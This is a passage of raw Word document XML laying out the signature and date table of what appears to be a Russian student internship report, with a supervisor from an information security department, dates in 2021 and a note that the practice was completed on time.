                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="458A600E" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6893CC1B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4888" w:type="dxa"/>
            <w:gridSpan w:val="9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="090A0B8B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Старший преподаватель кафедры информационной безопасности ШЕН</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="6C586EBB" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1548" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="270FFFC7" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BD44E9C" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2627" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AD87DEF" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>С.С.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> Зотов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E63E356" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="491525D8" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2084" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B59B3DF" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B565B23" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AF3217C" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>С.С.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> Зотов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="10C7AA79" w14:textId="77777777" w:rsidTr="007860B2">
        <w:trPr>
          <w:trHeight w:val="193"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1548" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="179CF03A" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>(подпись)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AB890F2" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2627" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="159D96BE" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>(И.О. Фамилия)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59ACB031" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50F03858" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2084" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AAE5B11" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>(подпись)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DE85F82" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56A4F13E" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>(И.О. Фамилия)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="67B0AB6C" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56E39A5B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="74A569F3" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08DE87C4" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2427" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C0B20AD" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>июня</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="883" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31F168B6" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2021 г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="154ADC1F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73EB481B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4888" w:type="dxa"/>
            <w:gridSpan w:val="9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="243A3284" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="32BBBD7F" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FAD3448" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="6A63C856" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6761770B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Регистрационный №</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2120CCE5" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02613640" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="666AEC8C" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4888" w:type="dxa"/>
            <w:gridSpan w:val="9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F0192A6" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Практика пройдена в срок</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="7F8DEEA2" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="110989E0" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35FB08CD" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A8D83AD" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2427" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22017092" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>июня</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="883" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C485A18" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2021 г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EB52860" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36DAED07" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="525" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07C3ECA7" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-150" w:firstLine="150"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>с</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="025A849C" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-150" w:firstLine="150"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="659E0227" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79C575D2" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27460076" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>февраля</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="438C7C6B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
